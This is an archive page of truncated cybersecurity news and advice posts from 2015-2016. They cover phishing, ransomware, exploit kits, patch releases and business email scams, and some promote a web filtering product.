The Federal Bureau of Investigation (FBI) has issued a new security alert warning of a new wave of extortion email schemes. The alert was issued after its Internet Crime Complaint Center (IC3) started receiving multiple reports from individuals who had been threatened with the exposure of their sensitive data. Cybercriminals are quick to respond to large-scale data breaches and use the fear surrounding the attacks to scam individuals into paying ransoms, clicking on links to malicious websites, or opening infected email attachments. In recent weeks, the Internet has been awash with news reports of major data breaches that have hit networking sites and a number of popular Internet platforms. Major data breaches affected LinkedIn, MySpace, and Tumblr, and while the stolen data are old, hundreds of millions of individuals have been affected. These cyberattacks occurred in 2012 and 2013, although the data stolen in the attacks have just been listed for sale online. These major data breaches had gone undiscovered until recently. Extortion Email Schemes Threaten Exposure of Sensitive Data Due to the volume of logins that were exposed in these attacks and the popularity of the sites, many individuals may be concerned that their login credentials may have been obtained by hackers. Cybercriminals are taking advantage of this fear and are sending out huge volumes of spam emails advising individuals that their sensitive data have been obtained. In the emails, individuals are told that their name, address, telephone number, credit card details, and other highly sensitive data are being held and that they will be distributed to friends and family if a ransom is not paid. The attackers warn their victims that access to social media accounts has been gained and that the attackers have details of all of the victim’s social media contacts. The scammers are also threatening to email and mail out details of credit card transactions and internet activity to friends, family, and employers, suggesting that the payment to prevent this from happening will be much lower than the cost of a divorce, and low in comparison to the affect it will have on relationships with friends and on...
by G Hunt |
May 13, 2016 |
Cybersecurity Advice, Network Security
To reduce the risk of malware infections from websites you can avoid certain types of sites that are commonly used by cybercriminals to infect visitors. Sites containing pornography for instance, torrents sites, and online marketplaces selling illegal medication for example. However, while these sites are often compromised with malware or contain malicious code, they are far from the most common sites used by cybercriminals to infect visitors. The unfortunately reality is that browsing the Internet and only visiting what are perceived to be “safe sites” does not mean that you will not be exposed to maware, malicious code, and exploit kits. Hackers are increasingly compromising seemingly legitimate websites to redirect visitors to sites containing exploit kits that download malware and ransomware. Two CBS-affiliated news websites were recently discovered to be hosting malicious adverts that redirect visitors to sites containing the Angler Exploit Kit. MSN has been found to host malvertising in the past, as has Yahoo. A study conducted by anti-virus company Symantec revealed that three quarters of websites contain security vulnerabilities that could potentially be exploited to infect visitors with malware. High Profile Websites Compromised and Used to Deliver Ransomware to Visitors This week, two new websites were found to have been compromised and were used to infect visitors with malware. The celebrity gossip website PerezHilton.com may cause problems for celebrities, but this week it was also causing problems for its visitors. The site attracts millions of visitors, yet few would suspect that visiting the site placed them at risk of having their computer files locked with powerful file-encrypting ransomware. However, that is exactly what has been happening. Hackers compromised an iframe on the site and inserted malicious code which redirected visitors to a website containing the Angler Exploit Kit. Angler probes visitors’ browsers for security vulnerabilities and exploits them; silently download a payload of malware. In this case, the Angler Exploit Kit was used to push Bedep malware, which in turn silently downloaded CryptXXX ransomware onto the victims’...
by G Hunt |
May 11, 2016 |
Cybersecurity Advice, Cybersecurity News
This week, patch Tuesday saw updates issued to address actively exploited security vulnerabilities in Internet Explorer, along with a swathe of fixes for a number of other critical Microsoft security vulnerabilities. In total, Microsoft issued fixes for 51 vulnerabilities this week spread across 16 security bulletins, half of which were rated as important, the other eight being rated as critical. The updates tackle vulnerabilities in Microsoft Edge and Internet Explorer, Windows, the Microsoft .NET Framework, and MS Office; however, it is the browser fixes that are the most important. These include actively exploited security vulnerabilities that can be used to compromise computers if users visit websites containing exploit kits. Security update MS16-051 tackles the CVE-2016-0189 zero-day vulnerability in Internet Explorer, which if exploited, would allow an attacker to gain the same level of privileges as the current user. The flaw could be used to take control of the entire system. The exploit could be used to install new programs on the device, create new accounts, or modify or delete data. The vulnerability modifies the functioning of JScript and VBScript, changing how they handle objects in the computer’s memory. The IE security vulnerability was brought to the attention of Microsoft by researchers at Symantec, who had discovered an active exploit that was being used alongside spear-phishing attacks in South Korea. Users were being directed to a website containing an exploit kit that had been updated with the IE security vulnerability. The MS16-052 security update tackles a vulnerability in Microsoft Edge which similarly changes how objects in the memory are handled. These two updates should be prioritized by sysadmins, although all of the updates should be installed as soon as possible. Even the important updates could potentially be exploited and used to gain control of unpatched computers. Bulletin MS16-054 is also a priority update to patch critical vulnerabilities in Adobe Flash. Since Flash is embedded in both Edge and IE, Microsoft has started issuing updates to address Adobe Flash vulnerabilities. While these security flaws are not believed to...
by G Hunt |
May 6, 2016 |
Cybersecurity Advice, Cybersecurity News
Finding a web security service for MSPs can be a time consuming process. There are a number of solutions that allow MSPs to keep their clients protected from malware and reduce the risk from internal and external threats, yet many are far from ideal for use by MSPs. The ideal web security service for MSPs must have a relatively low cost of ownership. Clients may be more than willing to implement a web security service to deal with the growing range of web-borne threats, but the cost of implementation is a key factor. Many solutions offer all the necessary benefits for the client, but are not practical for use by MSPs. The time taken to install web security solutions and to configure them for each client can reduce profitability. The best web security service for MSPs need to be easy to install and maintain, and have a low management overhead. Low cost solutions that are quick to install and easy to maintain allow MSPs to easily incorporate into existing packages to create a more comprehensive Internet security service. This can increase the value provided to clients, boost client revenue, and help MSPs to win more business and differentiate their company in the marketplace. The ideal web security service for MSPs is available as a white label. This allows the service to be easily incorporated into existing packages. White labeling allows MSPS to strengthen their own brand image rather than promoting someone else’s. Many providers of a web security service for MSPs fall down on customer support. If any issues are experienced, it is essential that an MSP can provide rapid solutions. Industry-leading technical support is essential. WebTitan Cloud – A Web Security Service for MSPs That Ticks All the Right Boxes WebTitan Cloud is an enterprise-class web filtering solution for MSPs that can be used to enforce clients’ acceptable use policies and control the content that can be accessed via their wired and wireless networks. Our DNS-based web filtering solution allows organizations to prevent phishing, stop malware downloads, protect against ransomware and botnet infections, and block spyware and adware. Controls prevent the bypassing of the content filter by...
by G Hunt |
May 5, 2016 |
Cybersecurity Advice, Cybersecurity News
Over the past two weeks there have been three worrying instances of the Angler exploit kit being used to infect website visitors with malware and ransomware. Cybercriminals are increasingly using exploit kits to deliver their malicious payloads and all organizations need to be aware of the risk. Why AUPs May Not Be Sufficient to Keep Networks Secure Many companies advise employees of the types of websites that can be accessed via work networks and which are forbidden. Typically, employees are banned from visiting pornographic websites, using the Internet for the sharing of copyright-protected material, installing shareware or other unauthorized software, and using unauthorized web applications and gaming sites. Employees are provided with a document which they are required to read and sign. They are informed of the actions that will be taken for breaching the rules: verbal and written warnings for example, and in some cases, instant dismissal. These AUPs are usually effective and employees do heed the warnings if they value their jobs. If an employee breaches the AUPs and accesses pornography for instance, action can be taken against that individual. It is probable that no harm will have been caused and the matter can be dealt with by HR. However, if an employee breaches AUPs and visits a website that has been compromised with malware or installs shareware that includes malicious files, taking action against the employee will not undo the damage caused. To better protect networks, AUPs should be enforced with a software solution. By implementing a web filtering solution, HR departments can ensure that inappropriate website content is not accessed, while IT departments can be prevented from having to deal with malware infections. Even if AUPs are followed to the letter, malware may still be downloaded onto the network. The risk has recently been highlighted by two security incidents discovered in the past two weeks. Legitimate Websites Compromised with Angler Exploit Kit Last week, news emerged that a toy manufacturer’s website had been compromised and was being used to infect visitors with malware. The website had been loaded with the Angler exploit kit and...
by G Hunt |
April 30, 2016 |
Cybersecurity Advice, Cybersecurity News
There are some very good reasons why you should block file sharing websites. These websites are primarily used to share pirated software, music, films, and TV shows. It would be unlikely for the owner of the copyright to take action against an employer for failing to prevent the illegal sharing of copyrighted material, but this is an unnecessary legal risk. However, the main risk from using these websites comes from malware. Research conducted by IDC in 2013 showed that out of 533 tests of websites and peer-2-peer file sharing networks, the downloading of pirated software resulted in spyware and tracking cookies being downloaded to users’ computers 78% of the time. More worryingly, Trojans were downloaded with pirated software 36% of the time. A survey conducted on IT managers and CIOs at the time indicated that malware was installed 15% of the time with the software. IDC determined that overall there was a one in three chance of infecting a machine with malware by using pirated software. Even visiting torrent sites can be harmful. This week Malwarebytes reported that visitors to The Pirate Bay were served malicious adverts. An advertiser used a pop-under to silently redirect users to a malicious site containing the Magnitude exploit kit which was used to downloaded Cerber ransomware onto users’ devices. A study conducted by UC San Diego involved testing pirated software downloads using VirusTotal. VirusTotal checks files against the databases of 47 different anti-virus engines. The research team determined that 50% of pirated files were infected with malware. Dealing with malware from pirated software was determined to take around 1.5 billion hours per year. For businesses the cost can be considerable. IDC calculated the cost to enterprises to be around $114 billion in 2013 alone. And that was just for the clean-up. The cost of data breaches caused by illegal software installations was estimated to be in the order of $350 billion. Time to Block File Sharing Websites? Organizations can monitor devices and check for unauthorized software installations on individual devices; however, by the time a software installation has been discovered, malware is likely to...
by G Hunt |
April 28, 2016 |
Cybersecurity Advice, Internet Security News
Organizations are investing in technology to ensure the perimeter defense are not breached; however, it is also important to address the risk of insider data breaches. According to a recent report from Forrester, internal incidents were responsible for more than half of data breaches suffered by firms. Cybercriminals have stepped up their efforts and are attacking organizations with increased vigor, but the report suggests more than half of data breaches are caused by employee errors, oversights, and negligence. Employees are under increasing pressure to get more work completed in less time. This can easily lead to errors being made or shortcuts being taken. Employees may be security minded most of the time, but it is all too easy for sloppy data security practices to creep in. Even with the most robust perimeter security defenses in place, simple mistakes can lead to disaster. Email Borne Attacks Are Still A Major Risk During the past 12 months the volume of spam email has fallen considerably. This is partly due to law enforcement taking down major botnets and the increasing use of efficient spam filters. Even with the reduced volume the threat from spam email is considerable. The Forrester report indicates spam email volume has dropped from almost 89% of all emails in 2014 to 68% of emails in 2015. However, over 91% of all spam emails contain a malicious link and 2.34% contain malicious email attachments. Cybersecurity awareness training has helped to mitigate the risk of insider breaches to some degree but they are still occurring. Most employees now know not to open email attachments from people they do not know, but what about from people they do know? There has been an increase in business email compromise attacks in recent months. These attacks involve the sending of spam and phishing emails from within an organization. These emails are more likely to result in malicious email attachments being opened and links being clicked than emails from strangers. All emails should be treated as suspicious and should be carefully checked, not only those from outside an organization. Employees are aware never to run an executable file that has been sent via email...
by G Hunt |
April 22, 2016 |
Cybersecurity Advice, Cybersecurity News
The healthcare industry has had a hard time in recent months; however, it is far from the only industry being targeted by hackers. Manufacturing company cyberattacks are on the increase and the industry is now second only to healthcare according to a new report from IBM X-Force Research. The manufacturing industry has replaced the financial sector as hackers attempt to gain access to intellectual property. Intellectual property can be sold for big bucks on the black market. $400 Billion Worth of Intellectual Property Is Stolen from U.S. Companies Every Year According to figures from the Federal Bureau of Investigation, each year over $400 billion worth of intellectual property is stolen from the United States and sold overseas. Many of the attacks are conducted by nation-state backed hacking groups, although a number of players have now got in on the act due to the value of data and the relative ease of breaking through manufacturing company cybersecurity defenses. According to the IBM’s 2016 Cyber Security Intelligence Index, manufacturers in the automotive sector were most frequently targeted. Chemical companies were the second most likely to be attacked. 30% of manufacturing company cyberattacks took place on automotive manufacturers. Not only are the potential rewards for successful manufacturing company cyberattacks high, attacks are relatively easy to pull off. A successful attack on a company in the financial sector may be rewarding, but the defenses put in place to keep hackers at bay are usually far more robust than in less well regulated industries such as manufacturing. The manufacturing industry has been relatively slow to improve cybersecurity defenses. Organizations in the healthcare industry are required to comply with the Health Insurance Portability and Accountability Act or HIPAA for short. HIPAA sets a number of minimum standards which must be met by all healthcare organizations. Administrative, technical, and physical safeguards must be implemented to keep patient data protected. The legislation has forced healthcare companies to improve their cybersecurity defenses. Similarly, legislation has been introduced that requires organizations in...
by G Hunt |
April 15, 2016 |
Cybersecurity Advice, Internet Security News
Two new vulnerabilities in QuickTime for Windows have recently been discovered, but a patch to address the flaws will not be issued by Apple. Apple has taken the decision to depreciate QuickTime for Windows and has advised all Windows users to uninstall the software to prevent vulnerabilities from being exploited. Apple intends to keep supporting the OSX version. The latest vulnerabilities in QuickTime for Windows (named ZDI-16-241 and ZDI-16-242) are both heap corruption remote code execution vulnerabilities, both of which allow an attacker to write data outside of an allocated heap buffer. The vulnerabilities could be exploited remotely, although user interaction is required. In order for an attacker to exploit these vulnerabilities the target would be required to open a malicious file or visit a malicious website. One of the vulnerabilities affects the moov atom (ZDI-16-241) while the other (ZDI-16-242) involves a flaw with atom processing. Both could allow data to be written outside of an allocated heap buffer by providing an invalid index. This would allow code to be executed in the context of Windows QuickTime player. Latest Vulnerabilities in QuickTime for Windows Require Uninstallation of the Software The discovery of the new vulnerabilities in QuickTime for Windows spells the end of the software for Windows users. Apple, Trend Micro, and US-CERT have all advised Windows users to uninstall QuickTime ASAP in order to stay protected. These two new vulnerabilities are unlikely to be the last to be discovered. Leaving the software installed will place users at risk of attack. Exploits for the new vulnerabilities are not believed to have been developed yet, and no active attacks are understood to have been conducted, but it is only a matter of time before the vulnerabilities are added to exploit kits. Whenever a software developer takes the decision to stop supporting software it means users must find alternatives. IT departments should ensure that all Windows machines have QuickTime uninstalled as soon as possible. Apple has decided to stop support for QuickTime for Windows as most media programs no longer use QuickTime to play common formats, while HTML...
by G Hunt |
April 8, 2016 |
Cybersecurity Advice, Cybersecurity News
The dramatic rise in business email scams in the past 12 months has prompted the Federal Bureau of Investigation (FBI) to issue a new warning. Companies of all sizes are being targeted with business email compromise scams which relieve companies of tens of thousands if not hundreds of thousands or millions of dollars. The FBI warns that scammers are now going to extraordinary lengths to fool company employees into making transfers of large sums of company funds into hacker’s accounts. These attacks are far from the random email spam campaigns typically associated with email scammers. Companies are extensively researched, individual targets are identified, and carefully crafted emails are sent. A variety of social engineering techniques are employed to convince an individual in the company to make a sizeable bank transfer to the attacker’s account. There are two main variants of these business email scams. The first involves gaining access to the email account of the CEO or a senior executive in the company. This is usually achieved with a spear phishing campaign. This phase of the attack involves researching the company and identifying a target. That target is then sent a spear phishing email in order to gain access to their email login credentials. Once access to an email account has been gained, emails are checked to determine the style of writing used by that individual – How they sign their emails, the terminology they use, and the level of familiarity they have with the second target: An individual that manages money or makes bank transfers for the company. An email is then sent from the executive’s email account requesting a transfer be made. Account details are supplied with a reason for urgency, and an explanation of why the request is being made. Since the emails come from a known source within the company, and the terminology and style of the email matches those typically received by the accounts department, the transfer is often made without being queried. Another variation on the same theme does not require access to an email account. Instead a domain name is purchased that is virtually identical to that used by the target company, often with...
by G Hunt |
March 31, 2016 |
Cybersecurity Advice, Network Security
There are a number of ways for managed service providers to increase cash flow and boost profits. Efficiency can be improved, staff productivity can be increased, better margins achieved, and new in-house products could be developed. Unfortunately, all of these are easier said than done. The main ways to increase profits by a significant amount is to attract new customers and increase the amount each existing client is spending. If only there was a secret ingredient that MSPs are missing that could help them help to win more business and get each client to spend more! The good news is that for many MSPs, there is such a product. Any MSP that has yet to include a web filtering service into their product portfolio could be missing out on substantial profits. Web Filtering – An Easy Way for MSPs to Increase Profits Filtering the Internet is now essential for many enterprises. In certain Industries it is mandatory for companies to filter the Internet. They need to ensure sensitive data are protected and risk is effectively managed. Networks must be protected from attacks by hackers and with an increasing number of web-borne threats, Internet usage policies alone are not sufficient to keep organizations protected. Those policies need to be enforced and a web filter is the natural choice. In some industries, education for example, it is mandatory for the Internet to be filtered. Minors must be prevented from accessing obscene website content or other material that could be harmful. Even when it is not mandatory to filter the Internet it is often desirable. Hotels, restaurants, transport networks, airports, cafes, and coffee shops are choosing to implement controls to ensure all users enjoy a safe browsing experience. In business, productivity losses from Internet abuse can be considerable. If every employee wasted an hour each day on personal Internet use, the losses to a medium-sized company would be substantial. Some studies suggest even more time is wasted by employees each day on non-work related Internet activities. Failure to filter the Internet can prove costly in many ways. For example, the accessing of adult content in the workplace can lead to the...
by G Hunt |
March 25, 2016 |
Cybersecurity Advice, Cybersecurity News
Web-borne attacks on enterprises are increasing, although it is important not to forget to protect against email attacks, as shown by a recent campaign using the Olympic Vision keylogger. Olympic Vision Keylogger Used in Recent Business Email Compromise Attacks The attackers behind the latest campaign are using the Olympic Vision keylogger to gain access to business email accounts. Trend Micro discovered the latest campaign and was able to trace the attacks and link them to two Nigerian cybercriminals. Trend Micro determined that the current campaign has been conducted in 18 different countries including the United States. Business email accounts contain a wealth of data, which in the wrong hands, could result in considerable damage being caused to an enterprise. However, it is not only data stored in the email accounts that hackers want to obtain. The cybercriminal gang behind the latest attacks have a different purpose. Attacks are being conducted to gain access to business email accounts to use them to send emails to account department employees instructing them to make bank transfers to the attackers’ accounts. Large transfers are often made following a business email compromise (BEC) attack. If hackers can gain access to the email account of a senior executive, they can use that account to send messages to members of staff in the accounts or billing departments requesting transfers be made to their bank accounts. BEC is a highly effective attack strategy. If an email is sent from a CEO to the accounts department requesting an urgent transfer be made, many employees would not think twice before making the transfer as instructed. This social engineering technique takes advantage of the fact that many employees would not question a direct request from a CEO or senior account executive. A transfer is made and the attacker receives the funds, withdraws the money, and closes the account. This often occurs before any red flags are raised, even when the transfer is for tens or hundreds of thousands of dollars. Sophisticated Attacks Being Conducted Using Unsophisticated Malware The Olympic Vision keylogger is not a sophisticated malware. Once installed on a device...
by G Hunt |
March 17, 2016 |
Cybersecurity Advice, Cybersecurity News
Enterprise social media usage policies have only been introduced by 54% of organizations according to a recent social media research study conducted by Osterman Research. Social media use in the workplace has grown significantly in recent years, both personal use of social media sites as well as the use of the platforms for business purposes. However, just over half of enterprises have implemented policies that limit or restrict use of the websites. Enterprises face a choice. Allow the use of the sites and accept that a considerable amount of each employee’s day will be devoted to personal social media site use, or place controls to limit use. These can be restrictions on the times that the sites can be accessed, the amount of time each employee is “allowed” to take as Facetime, or the actions that can be performed on social media sites. There are good reasons for not introducing social media usage policies. Some employers believe social media site use can improve collaboration between employees and departments. Some employers believe social media use can help improve corporate culture and even lead to faster decision making capabilities. However, some studies suggest that employers lose more than an hour each day per employee to social media networks. If that figure is multiplied by the 500 or more employees in an organization, it represents a considerable productivity loss. Many employers do not mind a little time on social media sites each day, provided that usage is kept within reasonable limits. An employee cannot be expected to work productively for a full 8 hours a day, so allowing some social media time can help employees recharge before they get back to working at full speed. If an employee takes 5 minutes every hour to check their Facebook feed, it could actually help to increase the work that they perform each day. Social Media Usage Policies Can Help Employers Manage Security Risk Use of social media platforms is not only about time not spent working. There is a security risk associated with the use of social media networks. That security risk is considerable and the risk is growing. The Osterman Research study revealed the risk of malware delivery...
by G Hunt |
March 10, 2016 |
Cybersecurity Advice
Ransomware is not new; however, cybercriminals have been using the malicious software with increased frequency in recent months as a sure fire way of generating income. It is now essential to protect networks from ransomware due to the increased risk of attack. What Is Ransomware? Ransomware can be considered to be rogue security software. It uses the same encryption that companies are advised to use to protect their data from cyberattackers. It encrypts files to prevent them from being used or accessed. Encrypted files can only be unlocked with a security key. Attackers lock data and demand a ransom to provide the security key. Without the key, the files will remain locked forever. It is therefore important for organizations to take steps to protect networks from ransomware. The threat of attack is increasing and failure to take proactive steps to reduce risk could prove costly. Why are Ransomware Infections Increasing? Malware can be used to record keystrokes and gain login credentials to access bank accounts, or to create botnets that can be sold as a service. Corporate secrets can be sold to the highest bidder, or Social Security numbers, names, and dates of birth stolen and sold on to identity thieves. However, attacks of this nature take time and effort. Ransomware on the other hand gives criminals the opportunity to make a quick buck. Several hundred of them in fact. If a cybercriminal can infect a single machine with ransomware and lock that device, a ransom of between $300 to $500 can be demanded. The ransom must be paid using the virtually anonymous Bitcoin currency. Bitcoin can be bought, sold, traded, and spent without having to disclose any identifying information. Cybercriminals are able to demand ransoms with reasonable certainty that they will not be caught. Ransomware-as-a-service is being offered on underground networks, meaning cybercriminals do not need to be skilled hackers or programmers. For a payment of between 5% to 20% of the profits and a nominal download fee, criminals are able to use the malware to generate a significant income. Ransomware is lucrative. One of the most sophisticated strains of ransomware, CryptoWall, has been...
by G Hunt |
February 21, 2016 |
Cybersecurity Advice
Nothing is certain in life apart from death and taxes, apart from tax season phishing scams which have started particularly early this year. Inboxes are already being flooded with phishing emails as cybercriminals attempt to file tax returns early. Not their own tax returns of course, but fraudulent claims on behalf of any email recipient who divulges their Social Security number and personal data to the scammers. Tax season phishing emails are sent out in the millions in the run up to the April 15, deadline. If a tax refund can be submitted before the victim, the criminals will receive the refund check. How to Spot Tax Season Phishing Scams Each year tax fraudsters develop new and ever more convincing phishing scams to get taxpayers to divulge their personal data and Social Security numbers. With these data, fraudsters can submit fake tax returns in the names of the victims. While phishing emails can be easy to spot in some cases, the fraudsters are now getting much better at crafting official looking emails that appear to have been set from the IRS. The emails use the same language that one would expect the IRS to use and the email templates use official logos. The emails contain links that have been masked to make the email recipient think they are being taken to an official website. Clicking on the link will fire up a browser window and the soon-to-be-victim will be taken to a website that looks official. Visitors will be asked to update their personal information, add their Social Security number, or even be requested to divulge their Self-Select PIN for the online tax portal. Divulging these data is almost certain to result in tax fraud. Tax Season Phishing Emails Are A Growing Concern Taxpayers have been warned to be ultra-cautious. More tax season phishing scams have been identified this year than in previous years, with tax-related phishing and malware scams up 400% year on year. IRS Commissioner John Koskinen warned that “Criminals are constantly looking for new ways to trick you out of your personal financial information so be extremely cautious about opening strange emails.” Tax season phishing scams are not only conducted via...
by G Hunt |
February 11, 2016 |
Cybersecurity Advice
One of the main priorities for IT professionals in 2016 is securing Wi-Fi hotspots. The use of unsecured public Wi-Fi is notoriously risky. Cybercriminals spy on the activity taking place at WiFi hotspots, and it is at these Internet access points is where many man-in-the-middle attacks take place. The Dangers of Unsecured WiFi Preventing employees from using personally owned and work devices on unsecured Wi-Fi networks is a major challenge, but one that must be met in order to keep work networks free from malware. When employees use smartphones, tablets, and laptops to connect to unsecured Wi-Fi networks, there is a high risk that those devices may be compromised. Hotspots are frequently used to deliver malware to unsuspecting website visitors, and malicious software can subsequently be transferred to work networks. With personally owned devices increasingly used for private and work purposes, the risk of a work network malware infection is particularly high. The risks associated with unsecured Internet access points are well known, yet people still tend to still engage in risky behavior when accessing the Internet via these wireless networks. In a rush to take advantage of free Internet access, basic security best practices are all too often ignored. Devices are allowed to connect to Wi-Fi hotspots automatically and Wi-Fi hotspots are not checked to find out if they are genuine or have been spoofed. Security Professionals Concerned About Employees’ Use of Unsecured WiFi Networks A recent survey conducted by the Cloud Security Alliance indicates security professionals are very concerned about the use of unsecured WiFi networks. The Cloud Security Alliance is a collective of security professionals, businesses, and privacy and security organizations that are committed to raising awareness of cybersecurity best practices. The organization recently conducted a survey and asked 210 security professionals their opinions on the top threats to mobile computing in 2016. 2010 member organizations were polled and more than 8 out of 10 respondents (81%) said that the threat from unsecured WiFi access points was very real, and was one of the biggest mobile security risks...
by G Hunt |
February 5, 2016 |
Cybersecurity Advice
Organizations running WiFi networks are facing attacks from all angles. Many companies are choosing to implement web filters for WiFi networks to help mitigate risk from the growing number of malware variants that are being used to attack businesses via their WiFi networks. A new report issued by Bilbao-based antivirus software developer Panda Security, has revealed the extent of the problem. Last year, over 84 million new malware samples were identified, which equates to 27% of all malware previously identified. The proliferation in malware has been attributed, in part, to the rise in use of antivirus software and the effectiveness of those software programs. When a new malware is discovered, antivirus signatures are updated and shared with all antivirus software developers. In a very short space of time, all AV engines will block a particular malware. Hackers have respondent by using software that modifies malware slightly, allowing hundreds or thousands of variants to be released. An increased number of malware variants are needed in order to get past antivirus software programs, as many AV engines are capable of detecting malware that has been modified slightly. The more variants are used, the higher the probability of malware getting past security software. When Panda was formed in 1990, the company was detecting approximately 100 new malware variants a day. Today 230,000 new samples are discovered every day, on average. Trojans are the most common malware form, with the full breakdown of new malware variants detailed below: Malware Type % of new malware discovered in 2015 Trojans 51.45% Viruses 22.79% Worms 13.22% PUPs 10.71% Spyware 1.83% Blocking Malware with a Web Filtering Solution Malware is installed on user devices via a variety of different vectors. Spam email is one of the most common methods of malware delivery, but fortunately, one of the most straightforward to block. A robust anti-spam solution can be used to block the vast majority (over 99.7%) of spam emails from being delivered. Training users how to recognize malware can help to ensure that any rogue emails that get past the filter will be identified and deleted before any damage is...
by G Hunt |
January 29, 2016 |
Cybersecurity Advice
A new report released by data privacy and security group Morrison and Foerster indicates the main privacy and security concerns of customers. Don’t Ignore the Privacy and Security Concerns of Customers If you ignore the privacy and security concerns of customers it is likely to have a significant effect on your bottom line. A new report recently released by Morrison and Foerster suggests that consumers are even more concerned about their privacy than four years ago. Furthermore, many will take action if they feel their privacy is not protected. The survey indicates more than one in three consumers have switched companies they do business with due to privacy concerns, and one in five would switch after a breach of their personal data. The company conducted a survey on 900 U.S. consumers in November, 2015. 35% of respondents said they had taken the decision switch companies or not buy products as a result of privacy concerns. When it came to a breach of personal information, 22% of individuals said they had taken the decision to stop purchasing products or had switched services as a result. According to the report, more educated individuals and higher earners were the most likely to stop doing business with a company as a result of a data breach. 28% of respondents educated to college degree level or higher said they would make the switch after a data breach compared to 18% of individuals without a college degree. For the upper income bracket, 33% said they stopped buying as a result of a data breach. That figure fell to 28% for the middle income bracket, and 17% for the low income bracket. When the company conducted the survey back in 2011, 54% of consumers said that privacy concerns affected their decision to make a purchase. In 2015, 82% of consumers said that privacy concerns influenced their purchasing decisions. Companies are not perfect, but consumers are intolerant of data breaches In 2011, 16% of consumers believed no business was perfect, and were therefore likely to overlook privacy issues and data breaches, whereas in 2015 the figure had fallen to 9%. The greatest concern is now the risk of identity theft, with the percentage of individuals worried...
by G Hunt |
January 14, 2016 |
Cybersecurity Advice
Over the past four weeks we have seen numerous cybersecurity predictions for 2016 issued by security firms. Security experts are trying to determine which part of the now incredibly broad threat landscape will be most favored by cybercriminals in 2016. Some companies have made very specific cybersecurity predictions for 2016. They have come out with very bold claims, even predicting the presidential elections will be disrupted by a major cyberattack. Others believe 2015 will be broadly similar to 2015, with just an increase in ransomware attacks and even more massive data breaches suffered. What all of the cybersecurity predictions for 2016 have in common is that the next 12 months are expected to be tough for security professionals. The number and types of devices now connecting to corporate networks is broader than ever before. People are now far more likely to own and use three or more Internet-connected devices and use them on a regular basis. Alternative payment methods are being used more frequently. There is now more than ever to attack and too many devices and systems to keep secure. Unsurprisingly, no one appears to be claiming that 2016 will be easier than last year for cybersecurity professionals. Cybersecurity predictions for 2016 The attack surface is now incredibly broad, but where are cybercriminals most likely to strike? This is what we think. Here are cybersecurity predictions for 2016. IoT – expect attacks on the Internet of Things Let’s start with a bold prediction. The IoT is likely to come under attack this year. I say bold, but that is only in terms of the timescale. IoT devices will be attacked, shut down, altered, remotely controlled, and used as a launchpad for attacks on other devices. If a device is constantly connected to the Internet, it will only be a matter of time before an attack takes place. One problem with adding IoT technology is the manufacturers of the devices are not security experts. A washing machine that can be controlled via Wi-Fi or a Smartphone app, and can be switched on remotely while you are at work, has been designed first and foremost to wash clothes. It has then had IoT functionality bolted on. It has not...
by G Hunt |
December 17, 2015 |
Cybersecurity Advice
In the United States, healthcare phishing emails are being sent in increasing volume by cybercriminals looking for an easy entry point into insurance and healthcare providers’ networks. Healthcare employees are now being targeted with spear phishing emails as they are seen to be the weakest link in the security chain, resulting in HIPAA compliance breaches. It is after all, much easier to gain entry to a healthcare network or EHR system if malware is installed by nurses, physicians, or administrative staff than it is to find and exploit server and browser security vulnerabilities. It is even easier if a member of staff can be convinced to divulge their email account or network login credentials. Hackers and cybercriminals are devising more sophisticated healthcare phishing emails for this purpose. Clever healthcare phishing emails could fall any number of staff members Even well trained IT security professionals have been fooled into responding to phishing scams, so what chance do busy physicians, nurses, and members of the billing department have of identifying healthcare phishing emails? According to the Department of Health and Human Services’ Office for Civil Rights (OCR), employers will be held responsible if their staff fall for a phishing email, unless they have taken proactive steps to reduce the risk of that occurring. This week, OCR announced it arrived at a settlement with University of Washington Medicine for a 90,000-record data breach that occurred as a result of staff falling for healthcare phishing emails. The settlement involved UWM paying OCR $750,000. Small to medium-sized healthcare organizations could also be fined for members of staff accidentally installing malware. UWM may be able to cover such a substantial fine, but the average 1-10 physician practice would be unlikely to have that sort of spare cash available. Such a penalty could prove to be catastrophic. Why was such a heavy fine issued? The issue OCR had with UWM was not the fact that a data breach was suffered, but that insufficient efforts had been made to prevent the breach from occurring. U.S. healthcare legislation requires all healthcare organizations to conduct a...
by G Hunt |
November 30, 2015 |
Cybersecurity Advice
Kaspersky Lab has made a number of web security predictions for 2016, alerting IT security professionals to what the company’s security experts believe next year has in store. The company has listed some of the biggest security threats that are expected over the coming year. Kaspersky Lab is one of the leading anti-virus and anti-malware software developers, and is a supplier of one of the two AV engines at the heart of WebTitan Web filtering solutions. The Kaspersky web security predictions for 2016 include opinions gained from over 40 of the company’s leading experts around the globe. The web security predictions for 2016 can be used by IT professionals as a guide to where the next cyberattack could come from. The Biggest Cyberattacks of 2014 and 2015 Last year saw numerous high profile attacks on some of the world’s best known brands. Around this time last year, Sony was hacked and its confidential data was posted online, causing much embarrassment and considerable financial loss. Some of the biggest names in retail in the U.S. were attacked in 2014 including Target and Home Depot. The start of this year saw attention switch to health insurers. In February, Anthem Inc. was attacked. The records of 78.8 million insurance subscribers were stolen. News of a cyberattack at Premera BlueCross closely followed. 11 million subscriber records were compromised in that attack. Later in the year, Excellus BlueCross BlueShield discovered hackers had potentially stolen the records of approximately 10 million subscribers. Healthcare providers were also hit. UCLA Health System suffered a data breach that exposed the records of 4.5 million patients. The U.S. Government was also targeted this year. The Office of Personnel Management was hacked and, while the perpetrators have not been identified, the attackers are believed to be government-backed hackers based in China. Over 22 million records were potentially stolen in that cyberattack. The IRS was also hacked and 300,000 individuals were affected. 37 million highly confidential records were obtained from internet dating website Ashley Maddison, and Hacking Team – a somewhat controversial provider of spyware –...
by G Hunt |
November 20, 2015 |
Cybersecurity Advice
